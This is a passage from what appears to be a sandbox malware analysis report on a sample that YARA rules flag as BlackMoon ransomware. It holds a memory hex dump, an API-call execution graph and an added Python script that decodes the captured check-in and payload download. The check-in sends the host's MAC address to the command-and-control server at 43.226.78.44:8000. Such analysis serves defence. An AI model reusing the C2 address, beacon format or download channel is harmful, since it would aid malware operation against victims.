2025-01-02 08:28:30 UTC | 4096 | IN | Data Raw: e8 ac 17 01 00 83 c4 04 8b 5d e8 85 db 74 09 53 e8 9c 17 01 00 83 c4 04 8b 5d e4 85 db 74 09 53 e8 8c 17 01 00 83 c4 04 8b 5d e0 85 db 74 09 53 e8 7c 17 01 00 83 c4 04 8b 5d dc 85 db 74 09 53 e8 6c 17 01 00 83 c4 04 8b 5d d8 85 db 74 09 53 e8 5c 17 01 00 83 c4 04 8b 5d d4 85 db 74 09 53 e8 4c 17 01 00 83 c4 04 8b 5d d0 85 db 74 09 53 e8 3c 17 01 00 83 c4 04 8b 5d cc 85 db 74 09 53 e8 2c 17 01 00 83 c4 04 8b 5d c8 85 db 74 09 53 e8 1c 17 01 00 83 c4 04 8b 5d c4 85 db 74 09 53 e8 0c 17 01 00 83 c4 04 8b 5d c0 53 8b 03 ff 10 e8 fc 16 01 00 83 c4 04 8b 5d bc 85 db 74 09 53 e8 ec 16 01 00 83 c4 04 8b 5d b8 85 db 74 09 53 e8 dc 16 01 00 83 c4 04 58 8b e5 5d c2 08 00 55 8b ec 81 ec 40 00 00 00 c7 45 fc 00 00 00 00 68 0c 00 00 00 e8 b2 16 01 00 83 c4 04 89 45 f8
                                                              Data Ascii: ]tS]tS]tS|]tSl]tS\]tSL]tS<]tS,]tS]tS]S]tS]tSX]U@EhE
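The two sessions above show the complete exchange: a plain-HTTP POST of channel_number and the host's MAC address to 43.226.78.44:8000 (the Referer is the same URL, the User-Agent claims MSIE 9.0 on Windows NT 6.1), then an HTTPS GET of 8001.dll from Aliyun OSS that returns a 229376-byte octet-stream whose first bytes are an MZ header. The script below is an added example, not part of the report, that decodes the report's "Data Raw" hex, checks the POST body against its Content-Length, confirms that the Content-MD5 and ETag headers describe the same object, and verifies the MZ/PE layout of the download. The beacon hex and the response headers are copied from the capture; the sample PE bytes keep the captured DOS header (e_lfanew 0xF8) and the Machine field 0x014c, but the stub between them is constructed zero padding, not captured data.

```python
"""Triage the two HTTP exchanges the sandbox captured.

Added example, not part of the Joe Sandbox report. Inputs are copied from
the captured sessions: the check-in body as the report prints it ('Data Raw'
hex), the response headers of the 8001.dll download, and the DOS header of
the downloaded object. Everything between that DOS header and the PE
signature is constructed padding, not captured bytes.
"""
import base64
import re
import struct
from urllib.parse import parse_qs

# Beacon body from the POST to 43.226.78.44:8000 and its Content-Length header.
BEACON_HEX = ("63 68 61 6e 6e 65 6c 5f 6e 75 6d 62 65 72 3d 38 30 30 33 26 6d 61 63 "
              "5f 61 64 64 72 65 73 73 3d 45 43 3a 46 34 3a 42 42 3a 45 41 3a 31 35 3a 38 38")
BEACON_CONTENT_LENGTH = 49

# Subset of the response headers for GET /8001.dll.
DOWNLOAD_HEADERS = """\
Content-Type: application/octet-stream
Content-Length: 229376
ETag: "0269CBD8F0D55E1B87BE84F31EE9F4C0"
Content-MD5: AmnL2PDVXhuHvoTzHun0wA==
Content-Disposition: attachment
"""

# 64-byte DOS header as captured (e_lfanew = 0xF8), constructed zero padding,
# then the "PE\0\0" signature and Machine = 0x014c that the capture shows.
DOS_HEADER = (bytes.fromhex("4d5a90000300000004000000ffff0000"
                            "b8000000000000004000000000000000")
              + bytes(28) + bytes.fromhex("f8000000"))
SAMPLE_BLOB = DOS_HEADER + bytes(0xF8 - len(DOS_HEADER)) + b"PE\0\0" + b"\x4c\x01"

MAC_RE = re.compile(r"^[0-9A-F]{2}(?::[0-9A-F]{2}){5}$")


def decode_raw(hex_text):
    """Turn the report's space-separated 'Data Raw' hex back into bytes."""
    return bytes.fromhex(hex_text.replace(" ", ""))


def parse_beacon(body, declared_length):
    """Decode the form-encoded check-in and validate what it carries."""
    fields = {k: v[0] for k, v in parse_qs(body.decode("ascii")).items()}
    mac = fields.get("mac_address", "")
    return {
        "length_ok": len(body) == declared_length,
        "channel_number": fields.get("channel_number"),
        "mac_address": mac,
        "mac_well_formed": MAC_RE.match(mac) is not None,
    }


def parse_headers(text):
    """Header block -> dict keyed by lower-cased header name."""
    headers = {}
    for line in text.splitlines():
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def object_md5(headers):
    """Hex MD5 of the served object if Content-MD5 and ETag agree, else None.
    Aliyun OSS derives both from the same digest for plain uploads, so a
    mismatch means one of them does not describe the body that was received."""
    etag = headers.get("etag", "").strip('"').upper()
    b64 = headers.get("content-md5")
    if not (etag and b64):
        return None
    digest = base64.b64decode(b64).hex().upper()
    return digest if digest == etag else None


def pe_summary(blob):
    """Confirm an MZ/PE layout and pull e_lfanew and the Machine field."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return {"is_pe": False}
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(blob) < e_lfanew + 6:
        return {"is_pe": False, "e_lfanew": e_lfanew}
    machine = struct.unpack_from("<H", blob, e_lfanew + 4)[0]
    return {"is_pe": True, "e_lfanew": e_lfanew, "machine": machine}


def triage(beacon, headers, pe):
    """Indicators an analyst would record from these two exchanges."""
    notes = []
    if beacon["mac_well_formed"]:
        notes.append("check-in sends the host MAC address %s" % beacon["mac_address"])
    if headers.get("content-type") == "application/octet-stream" and pe["is_pe"]:
        notes.append("octet-stream download is a PE (e_lfanew=0x%x, machine=0x%04x)"
                     % (pe["e_lfanew"], pe["machine"]))
    digest = object_md5(headers)
    if digest:
        notes.append("served object MD5 %s; pivot against dropped-file hashes" % digest.lower())
    return notes


if __name__ == "__main__":
    beacon = parse_beacon(decode_raw(BEACON_HEX), BEACON_CONTENT_LENGTH)
    headers = parse_headers(DOWNLOAD_HEADERS)
    for note in triage(beacon, headers, pe_summary(SAMPLE_BLOB)):
        print(note)
```

The base64 Content-MD5 decodes to the same 16 bytes the ETag spells out in hex, so 0269cbd8f0d55e1b87be84f31ee9f4c0 is the MD5 of the full 229376-byte object and can be compared with the hash of whatever the sample wrote to disk; the 0x014c Machine value marks the payload as 32-bit x86, consistent with the Wow64 process that fetched it.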


                                                              Target ID:0
                                                              Start time:03:28:25
                                                              Start date:02/01/2025
                                                              Path:C:\Users\user\Desktop\1734098836319.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\1734098836319.exe"
                                                              Imagebase:0x400000
                                                              File size:547'840 bytes
                                                              MD5 hash:B2524709C9B62C107EAA1235DB37CBDB
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:false

                                                                Execution Graph

                                                                Execution Coverage:3.3%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:31.1%
                                                                Total number of Nodes:1233
                                                                Total number of Limit Nodes:29
                                                                execution_graph 113976 404c60 113977 404c65 113976->113977 114058 42b880 113977->114058 113979 404cb1 114063 42b970 113979->114063 113981 404cda 114007 404e77 113981->114007 114123 406c14 113981->114123 113983 404f78 113985 404f82 113983->113985 113986 404ff8 113983->113986 113984 404ecc 114068 42bb90 113984->114068 113993 404f96 InternetOpenA 113985->113993 113989 405002 InternetOpenA 113986->113989 113990 40504a 113986->113990 113988 404dd1 114131 42bb00 GetProcessHeap RtlAllocateHeap MessageBoxA 113988->114131 113997 404f33 113989->113997 113994 40505e InternetOpenA 113990->113994 113991 404ee7 113992 42bb90 3 API calls 113991->113992 113995 404f08 InternetOpenA 113992->113995 113993->113997 113994->113997 113995->113997 114009 4050c5 113997->114009 114073 406ff8 113997->114073 113999 4050fb 114095 4079a2 113999->114095 114001 404e27 114001->114007 114132 406eb2 GetProcessHeap RtlAllocateHeap MessageBoxA 114001->114132 114002 405106 114003 42bb90 3 API calls 114002->114003 114005 405124 114003->114005 114006 42bb90 3 API calls 114005->114006 114008 405145 InternetConnectA 114006->114008 114007->113983 114007->113984 114010 40517b 114008->114010 114011 4051d5 InternetCloseHandle 114010->114011 114012 40520b 114010->114012 114011->114009 114105 407be2 114012->114105 114014 40531f 114015 42bb90 3 API calls 114014->114015 114016 40533d 114015->114016 114017 42bb90 3 API calls 114016->114017 114018 40535e HttpOpenRequestA 114017->114018 114019 405392 114018->114019 114020 4053ec InternetCloseHandle 114019->114020 114021 40544e InternetSetOptionA 114019->114021 114022 405401 114020->114022 114023 405418 InternetCloseHandle 114020->114023 114032 405479 114021->114032 114022->114023 114023->114009 114024 4057c7 114025 4057d5 114024->114025 114026 4057ea HttpSendRequestA 114025->114026 114028 405815 114026->114028 114027 405831 114034 405899 114027->114034 114133 42b4e0 114027->114133 114029 40593b 
114028->114029 114108 42b8f0 114029->114108 114032->114024 114032->114027 114033 4059a8 InternetReadFile 114037 405974 114033->114037 114035 405914 HttpSendRequestA 114034->114035 114035->114029 114037->114033 114038 405a4d 114037->114038 114113 42bbb0 114037->114113 114118 42bbe0 114038->114118 114040 405a68 114041 405a84 HttpQueryInfoA 114040->114041 114042 405ad1 InternetCloseHandle 114041->114042 114043 405aba 114041->114043 114044 405ae6 114042->114044 114045 405afd InternetCloseHandle 114042->114045 114043->114042 114044->114045 114046 405b12 114045->114046 114047 405b29 InternetCloseHandle 114045->114047 114046->114047 114048 405b3e 114047->114048 114146 42a430 114048->114146 114050 405fcf 114051 42b880 3 API calls 114050->114051 114052 406044 114051->114052 114052->114009 114185 40803b 52 API calls 114052->114185 114054 406c14 32 API calls 114056 405b8c 114054->114056 114056->114050 114056->114054 114057 42bb00 GetProcessHeap RtlAllocateHeap MessageBoxA 114056->114057 114161 42bc10 114056->114161 114057->114056 114060 42b88c 114058->114060 114059 42b8c4 114059->113979 114060->114059 114186 429e40 114060->114186 114062 42b8ad 114062->113979 114064 42b97c 114063->114064 114065 42b985 114064->114065 114066 429e40 3 API calls 114064->114066 114065->113981 114067 42b991 114066->114067 114067->113981 114069 42bb99 114068->114069 114070 42bb9d 114068->114070 114069->113991 114071 429e40 3 API calls 114070->114071 114072 42bba4 114071->114072 114072->113991 114074 407012 114073->114074 114075 42b970 3 API calls 114074->114075 114076 40706b 114075->114076 114077 40749d 114076->114077 114081 407093 114076->114081 114078 42bc10 32 API calls 114077->114078 114079 4074ee 114078->114079 114082 42bc10 32 API calls 114079->114082 114080 42b880 3 API calls 114083 40715f 114080->114083 114081->114080 114086 40755d 114082->114086 114084 40719d 114083->114084 114088 407216 114083->114088 114085 406c14 32 API calls 114084->114085 114091 4071d6 114085->114091 114089 42b880 3 API 
calls 114086->114089 114094 40734a 114086->114094 114087 406c14 32 API calls 114087->114091 114088->114087 114089->114094 114090 42a430 32 API calls 114090->114094 114091->114090 114091->114094 114092 407855 114092->113999 114093 42b880 3 API calls 114093->114092 114094->114092 114094->114093 114096 406ff8 32 API calls 114095->114096 114097 4079e0 114096->114097 114098 407b09 114097->114098 114102 407a4c 114097->114102 114099 42b970 3 API calls 114098->114099 114100 407b2e 114099->114100 114101 42b880 3 API calls 114100->114101 114104 407ae6 114101->114104 114191 42c090 114102->114191 114104->114002 114106 406ff8 32 API calls 114105->114106 114107 407c2c 114106->114107 114107->114014 114109 42b8f9 114108->114109 114110 42b8fd 114108->114110 114109->114037 114275 429df0 114110->114275 114112 42b906 114112->114037 114114 42bbdb 114113->114114 114115 42bbb8 114113->114115 114114->114037 114115->114114 114280 430ef0 GetProcessHeap RtlAllocateHeap MessageBoxA 114115->114280 114117 42bbd7 114117->114037 114119 42bbe9 114118->114119 114120 42bbed 114118->114120 114119->114040 114121 429e40 3 API calls 114120->114121 114122 42bbf7 114121->114122 114122->114040 114124 406c4f 114123->114124 114125 42bc10 32 API calls 114124->114125 114126 406c8c 114125->114126 114127 42bc10 32 API calls 114126->114127 114129 406cfd 114127->114129 114128 406e72 114128->113988 114129->114128 114281 42a0b0 GetProcessHeap RtlAllocateHeap MessageBoxA 114129->114281 114131->114001 114132->114007 114134 42b4ff 114133->114134 114136 42b50b 114134->114136 114137 42b53e 114134->114137 114135 42b5a2 114135->114034 114282 430ef0 GetProcessHeap RtlAllocateHeap MessageBoxA 114136->114282 114137->114135 114139 42b559 114137->114139 114140 42b57a 114137->114140 114283 430ef0 GetProcessHeap RtlAllocateHeap MessageBoxA 114139->114283 114284 430ef0 GetProcessHeap RtlAllocateHeap MessageBoxA 114140->114284 114141 42b535 114141->114034 114144 42b571 114144->114034 114145 42b599 114145->114034 114148 42a441 
114146->114148 114147 42a578 114147->114056 114148->114147 114149 4dc45e _rand 24 API calls 114148->114149 114150 42a4a1 114149->114150 114150->114147 114152 42a4f5 114150->114152 114285 430a00 29 API calls 114150->114285 114151 42a516 114153 429e40 3 API calls 114151->114153 114152->114151 114286 430a00 29 API calls 114152->114286 114156 42a52d 114153->114156 114157 42a55d 114156->114157 114287 4309c0 GetProcessHeap RtlAllocateHeap MessageBoxA 114156->114287 114159 42a56b 114157->114159 114160 4dc375 _rand 24 API calls 114157->114160 114159->114056 114160->114159 114162 42be4f 114161->114162 114163 42bc23 114161->114163 114162->114056 114163->114162 114164 42bc5d 114163->114164 114171 42bc71 114163->114171 114288 4309c0 GetProcessHeap RtlAllocateHeap MessageBoxA 114164->114288 114166 42bc66 114166->114056 114167 42bcfc 114289 4309c0 GetProcessHeap RtlAllocateHeap MessageBoxA 114167->114289 114169 42bd03 114169->114056 114170 4dc45e _rand 24 API calls 114172 42bcef 114170->114172 114171->114167 114171->114170 114172->114167 114173 42bd0e 114172->114173 114175 42bd82 114173->114175 114178 42bd31 114173->114178 114174 42bd80 114176 42bde6 114174->114176 114290 430a00 29 API calls 114174->114290 114175->114174 114181 430a00 29 API calls 114175->114181 114180 429e40 3 API calls 114176->114180 114177 430a00 29 API calls 114177->114178 114178->114174 114178->114177 114184 42bdf4 114180->114184 114181->114175 114182 42be42 114182->114056 114183 4dc375 _rand 24 API calls 114183->114182 114184->114182 114184->114183 114185->114009 114187 429e54 RtlAllocateHeap 114186->114187 114188 429e49 GetProcessHeap 114186->114188 114189 429e82 114187->114189 114190 429e69 MessageBoxA 114187->114190 114188->114187 114189->114062 114190->114189 114192 42c0a3 114191->114192 114193 42c10a __ftol 114191->114193 114192->114193 114201 431410 114192->114201 114193->114104 114195 42c0e4 114196 42c103 114195->114196 114214 4dc63c 6 API calls 114195->114214 114196->114104 114198 42c0f3 114215 
429f00 114198->114215 114203 43141b 114201->114203 114202 431422 114202->114195 114203->114202 114220 4dc45e 114203->114220 114205 43146f 114206 43147a LCMapStringA 114205->114206 114207 431499 114206->114207 114209 4314a3 114206->114209 114223 4dc375 114207->114223 114240 4309c0 GetProcessHeap RtlAllocateHeap MessageBoxA 114209->114240 114211 4314b3 114212 4dc375 _rand 24 API calls 114211->114212 114213 4314bb 114212->114213 114213->114195 114214->114198 114216 429f46 114215->114216 114217 429f0d 114215->114217 114216->114104 114217->114216 114218 429f2b IsBadReadPtr 114217->114218 114218->114216 114219 429f38 RtlFreeHeap 114218->114219 114219->114216 114241 4dc470 114220->114241 114224 4dc44f 114223->114224 114225 4dc3a3 114223->114225 114224->114209 114226 4dc3ad 114225->114226 114227 4dc3e8 114225->114227 114269 4e06db 24 API calls _rand 114226->114269 114228 4dc3d9 114227->114228 114272 4e06db 24 API calls _rand 114227->114272 114228->114224 114230 4dc441 HeapFree 114228->114230 114230->114224 114232 4dc3b4 _rand 114233 4dc3ce 114232->114233 114270 4df511 VirtualFree VirtualFree HeapFree _rand 114232->114270 114271 4dc3df RtlLeaveCriticalSection _rand 114233->114271 114236 4dc3f4 _rand 114239 4dc420 114236->114239 114273 4e0298 VirtualFree HeapFree VirtualFree _rand 114236->114273 114274 4dc437 RtlLeaveCriticalSection _rand 114239->114274 114240->114211 114243 4dc46d 114241->114243 114244 4dc477 _rand 114241->114244 114243->114205 114244->114243 114245 4dc49c 114244->114245 114246 4dc4c9 114245->114246 114250 4dc50c 114245->114250 114252 4dc4f7 114246->114252 114263 4e06db 24 API calls _rand 114246->114263 114248 4dc4df 114264 4df83a 5 API calls _rand 114248->114264 114249 4dc57b RtlAllocateHeap 114260 4dc4fe 114249->114260 114250->114252 114253 4dc52e 114250->114253 114252->114249 114252->114260 114266 4e06db 24 API calls _rand 114253->114266 114254 4dc4ea 114265 4dc503 RtlLeaveCriticalSection _rand 114254->114265 114257 4dc535 114267 4e02dd VirtualAlloc 
_rand 114257->114267 114259 4dc548 114268 4dc562 RtlLeaveCriticalSection _rand 114259->114268 114260->114244 114262 4dc555 114262->114252 114262->114260 114263->114248 114264->114254 114265->114252 114266->114257 114267->114259 114268->114262 114269->114232 114270->114233 114271->114228 114272->114236 114273->114239 114274->114228 114276 429e04 RtlAllocateHeap 114275->114276 114277 429df9 GetProcessHeap 114275->114277 114278 429e32 114276->114278 114279 429e19 MessageBoxA 114276->114279 114277->114276 114278->114112 114279->114278 114280->114117 114281->114128 114282->114141 114283->114144 114284->114145 114285->114150 114286->114151 114287->114156 114288->114166 114289->114169 114290->114176 114291 462834 114292 462a4a 114291->114292 114299 46284e 114291->114299 114293 462a54 114292->114293 114294 462cea 114292->114294 114297 462fa1 13 API calls 114293->114297 114295 462cf4 114294->114295 114296 462e05 114294->114296 114435 47ba0f CreateThread WaitForSingleObject CloseHandle 114295->114435 114301 462ef7 114296->114301 114302 462e0f 114296->114302 114300 462a59 114297->114300 114334 462929 114299->114334 114371 462fa1 114299->114371 114311 462a87 114300->114311 114312 462afe 114300->114312 114310 463adb 8 API calls 114301->114310 114339 4629ea 114301->114339 114303 462fa1 13 API calls 114302->114303 114307 462e14 114303->114307 114306 462d05 114309 462fa1 13 API calls 114306->114309 114318 4cb3e0 9 API calls 114307->114318 114307->114339 114308 46289c 114313 4628ff 114308->114313 114314 4628a9 114308->114314 114315 462d0a 114309->114315 114323 462f06 114310->114323 114422 442748 7 API calls 114311->114422 114319 4cb3e0 9 API calls 114312->114319 114387 4cb3e0 114313->114387 114419 463942 7 API calls 114314->114419 114324 4cb3e0 9 API calls 114315->114324 114365 462b9e 114315->114365 114343 462e55 114318->114343 114330 462b1e 114319->114330 114320 462aa2 114423 442748 7 API calls 114320->114423 114321 4628ae 114420 442748 7 API calls 114321->114420 114333 4d17b9 192 
API calls 114323->114333 114323->114339 114350 462d5b 114324->114350 114326 4628bf 114421 442748 7 API calls 114326->114421 114328 462ac3 114424 463942 7 API calls 114328->114424 114329 462986 114329->114339 114409 4d17b9 114329->114409 114335 462b54 114330->114335 114333->114339 114400 463adb 114334->114400 114336 462b67 114335->114336 114337 462b8d 114335->114337 114426 442748 7 API calls 114336->114426 114427 442748 7 API calls 114337->114427 114342 462ad8 114425 442748 7 API calls 114342->114425 114343->114339 114344 462ec7 114343->114344 114437 442748 7 API calls 114344->114437 114345 462b78 114352 462fa1 13 API calls 114345->114352 114348 462ae9 114348->114312 114349 4628e0 114349->114313 114350->114365 114436 442748 7 API calls 114350->114436 114354 462bbd 114352->114354 114353 462c6e 114355 462fa1 13 API calls 114353->114355 114354->114353 114428 442748 7 API calls 114354->114428 114357 462c83 114355->114357 114359 462c90 114357->114359 114360 462cbb 114357->114360 114358 462bfc 114429 442748 7 API calls 114358->114429 114433 442748 7 API calls 114359->114433 114360->114365 114434 47b908 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114360->114434 114363 462c1d 114430 47b76f 7 API calls 114363->114430 114365->114339 114367 462c32 114431 442748 7 API calls 114367->114431 114369 462c4d 114432 442748 7 API calls 114369->114432 114372 462fbb 114371->114372 114373 463047 114372->114373 114442 463720 lstrcpynW 114372->114442 114375 4cb3e0 9 API calls 114373->114375 114376 463067 114375->114376 114438 4637f5 lstrcpynW 114376->114438 114378 46307c 114440 463884 lstrcpyn 114378->114440 114380 4631a9 114381 463884 lstrcpyn 114380->114381 114382 4631e8 114381->114382 114386 46352f 114382->114386 114443 4ca2b0 114382->114443 114384 4cb3e0 9 API calls 114384->114386 114385 46354a 114385->114384 114385->114386 114386->114308 114388 4cb3ff 114387->114388 114390 4cb468 114387->114390 114389 4cb664 114388->114389 114452 4cb370 CoUninitialize 
ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114388->114452 114389->114334 114390->114389 114392 4cb4e9 114390->114392 114393 4cb507 114390->114393 114398 4cb48e 114390->114398 114453 4cb370 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114392->114453 114454 4d0cf0 __ftol __ftol __ftol __ftol 114393->114454 114394 4cb459 114394->114334 114397 4cb4f8 114397->114334 114398->114389 114455 4ca190 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114398->114455 114456 4caef0 114400->114456 114402 463b0d 114461 463c33 114402->114461 114404 463b30 114405 463b3d GetModuleFileNameA 114404->114405 114408 463b8e 114404->114408 114406 463b5a 114405->114406 114407 463b79 PathFindFileNameA 114406->114407 114406->114408 114407->114408 114408->114329 114410 4d17d5 114409->114410 114414 4d17cc 114409->114414 114410->114414 114418 4d17fd 114410->114418 114478 4d16e0 114410->114478 114413 4d1809 114415 4d181d 114413->114415 114416 4d16e0 67 API calls 114413->114416 114413->114418 114414->114418 114466 4c9f90 114414->114466 114417 4d16e0 67 API calls 114415->114417 114415->114418 114416->114415 114417->114418 114418->114339 114419->114321 114420->114326 114421->114349 114422->114320 114423->114328 114424->114342 114425->114348 114426->114345 114427->114365 114428->114358 114429->114363 114430->114367 114431->114369 114432->114353 114433->114365 114434->114365 114435->114306 114436->114365 114437->114365 114439 46381f 114438->114439 114439->114378 114441 4638aa 114440->114441 114441->114380 114442->114373 114444 4ca2c1 114443->114444 114447 4ca2c6 114443->114447 114450 4ca030 GetModuleHandleA 114444->114450 114446 4ca324 114446->114385 114447->114446 114447->114447 114451 4ca190 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114447->114451 114449 4ca309 114449->114385 114450->114447 114451->114449 114452->114394 114453->114397 114454->114398 114455->114389 114457 4caefd 114456->114457 114458 4caef9 
114456->114458 114465 4ca190 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114457->114465 114458->114402 114460 4caf08 114460->114402 114462 463c46 114461->114462 114463 463cf7 VirtualQuery 114462->114463 114464 463d67 114463->114464 114464->114404 114465->114460 114467 4c9fca 114466->114467 114468 4c9fa1 114466->114468 114513 4ca000 CoUninitialize 114467->114513 114469 4c9fcf 114468->114469 114471 4c9fa4 114468->114471 114472 47f5d8 14 API calls 114469->114472 114507 4d0300 114471->114507 114473 4c9fdb 114472->114473 114473->114413 114479 4d16ed GetVersion 114478->114479 114480 4d1775 114478->114480 114961 4d3c1e HeapCreate 114479->114961 114482 4d177b 114480->114482 114483 4d17a7 114480->114483 114485 4d1740 114482->114485 114487 4d1796 114482->114487 114976 4d31f5 22 API calls 114482->114976 114483->114485 114980 4d33c1 21 API calls _rand 114483->114980 114484 4d16ff 114484->114485 114970 4d32d5 27 API calls _rand 114484->114970 114485->114414 114977 4d361d 20 API calls _rand 114487->114977 114491 4d1737 114493 4d173b 114491->114493 114494 4d1744 GetCommandLineA 114491->114494 114492 4d179b 114978 4d3329 25 API calls 114492->114978 114971 4d3c7b 6 API calls 114493->114971 114972 4d3977 27 API calls _rand 114494->114972 114498 4d17a0 114979 4d3c7b 6 API calls 114498->114979 114499 4d1754 114973 4d3461 24 API calls _rand 114499->114973 114502 4d175e 114974 4d372a 20 API calls _rand 114502->114974 114504 4d1763 114975 4d3671 19 API calls _rand 114504->114975 114506 4d1768 114506->114485 114514 4c95a4 114507->114514 114510 47f5d8 114955 47f559 114510->114955 114512 47f5f1 114512->114413 114527 4c958e 114514->114527 114516 4c95ac 114530 439a29 114516->114530 114518 4c95cf 114533 454585 114518->114533 114520 4c95e8 114559 47e392 HeapCreate 114520->114559 114522 4c95f2 114561 47e42c 114522->114561 114524 4c95fc 114570 43fba0 114524->114570 114603 47f70e 114527->114603 114529 4c9593 114529->114516 114737 439a44 114530->114737 114532 439a31 
114532->114518 114749 454a59 114533->114749 114535 4545af 114536 454651 GetVersionExA 114535->114536 114537 4546df 114536->114537 114538 4ca2b0 6 API calls 114537->114538 114539 45473e 114538->114539 114540 4ca2b0 6 API calls 114539->114540 114541 45479d 114540->114541 114776 450dd1 114541->114776 114543 4548a5 114783 44fb1e 114543->114783 114545 4548e4 114793 454ef8 114545->114793 114547 454927 114819 455ca7 114547->114819 114551 454956 114825 4ca730 114551->114825 114553 454976 114830 4cc4e0 114553->114830 114555 45499f 114556 4cb3e0 9 API calls 114555->114556 114557 4549f4 RegisterClipboardFormatA 114556->114557 114558 454a0f 114557->114558 114558->114520 114560 47e3bc 114559->114560 114560->114522 114563 47e445 114561->114563 114562 47e484 lstrcpynW 114564 47e494 114562->114564 114563->114562 114908 47e637 114564->114908 114566 47e5d0 MessageBoxA 114568 47e5bb 114566->114568 114568->114524 114569 47e4dd 114569->114566 114569->114568 114914 47ef67 GetPEB 114569->114914 114919 43ff2b 114570->114919 114572 43fbbc 114573 43ff05 114572->114573 114927 4400b3 6 API calls 114572->114927 114923 440163 114573->114923 114577 43fbe5 114578 4cb3e0 9 API calls 114577->114578 114579 43fc03 114578->114579 114928 4cb6b0 PathFileExistsA 114579->114928 114581 43fc67 114581->114573 114929 4400b3 6 API calls 114581->114929 114583 43fc8c 114584 4cb3e0 9 API calls 114583->114584 114585 43fcaa 114584->114585 114930 4cb6c0 CreateFileA 114585->114930 114587 43fd71 114938 4400b3 6 API calls 114587->114938 114589 43fd1a 114589->114587 114937 4cb120 MessageBoxA __ftol __ftol __ftol __ftol 114589->114937 114590 43fd79 114591 4cb3e0 9 API calls 114590->114591 114593 43fd97 114591->114593 114939 4cb6b0 PathFileExistsA 114593->114939 114595 43fdfb 114595->114573 114940 4400b3 6 API calls 114595->114940 114597 43fe20 114598 4cb3e0 9 API calls 114597->114598 114599 43fe3e 114598->114599 114600 4cb6c0 4 API calls 114599->114600 114601 43feae 114600->114601 114601->114573 114941 4cb120 MessageBoxA 
__ftol __ftol __ftol __ftol 114601->114941 114604 47f718 114603->114604 114607 47fcf0 114604->114607 114606 47f7c7 114606->114529 114613 4ceb90 SetCurrentDirectoryA 114607->114613 114614 483495 114607->114614 114608 47fd06 114621 4cb6b0 PathFileExistsA 114608->114621 114610 47fd82 114610->114606 114613->114608 114622 4ceb40 GetCurrentDirectoryA 114614->114622 114616 4835b0 114616->114608 114617 4834ad 114617->114616 114619 483561 114617->114619 114627 4835c8 114617->114627 114702 4ceb90 SetCurrentDirectoryA 114619->114702 114621->114610 114623 4ceb7d 114622->114623 114624 4ceb5d 114622->114624 114623->114617 114703 4d0680 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114624->114703 114626 4ceb72 114626->114617 114628 483a41 114627->114628 114629 4835e2 114627->114629 114631 483a4b 114628->114631 114632 483bc0 114628->114632 114704 4ceba0 114629->114704 114633 4ceba0 22 API calls 114631->114633 114634 483bca 114632->114634 114635 483d3f 114632->114635 114637 483a72 114633->114637 114638 4ceba0 22 API calls 114634->114638 114644 4ceba0 22 API calls 114635->114644 114689 48382b 114635->114689 114636 483609 114639 483664 114636->114639 114640 483614 114636->114640 114641 483a7d 114637->114641 114661 483acd 114637->114661 114643 483bf1 114638->114643 114642 4ceba0 22 API calls 114639->114642 114718 4ccb60 28 API calls 114640->114718 114727 4ccb60 28 API calls 114641->114727 114647 48368b 114642->114647 114648 483bfc 114643->114648 114664 483c4c 114643->114664 114649 483d70 114644->114649 114650 4836e6 114647->114650 114651 483696 114647->114651 114730 4ccb60 28 API calls 114648->114730 114653 483d7b 114649->114653 114667 483dcb 114649->114667 114656 4ceba0 22 API calls 114650->114656 114719 4ccb60 28 API calls 114651->114719 114733 4ccb60 28 API calls 114653->114733 114658 48370d 114656->114658 114660 483718 114658->114660 114669 483768 114658->114669 114659 483641 114659->114689 114720 4ccb60 28 API calls 114660->114720 114662 4842ef 
PathFileExistsA 114661->114662 114672 483b12 114662->114672 114665 4842ef PathFileExistsA 114664->114665 114673 483c91 114665->114673 114666 483ef4 114666->114619 114668 4842ef PathFileExistsA 114667->114668 114675 483e10 114668->114675 114716 4842ef PathFileExistsA 114669->114716 114671 4837ad 114684 48385b 114671->114684 114686 4837ca 114671->114686 114672->114689 114728 484331 50 API calls 114672->114728 114673->114689 114731 484331 50 API calls 114673->114731 114675->114689 114734 484331 50 API calls 114675->114734 114676 483b74 114729 484545 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114676->114729 114679 483cf3 114732 484545 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114679->114732 114681 483e72 114735 484545 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114681->114735 114685 4842ef PathFileExistsA 114684->114685 114688 4838a0 114685->114688 114721 484331 50 API calls 114686->114721 114692 4838bd 114688->114692 114694 48394e 114688->114694 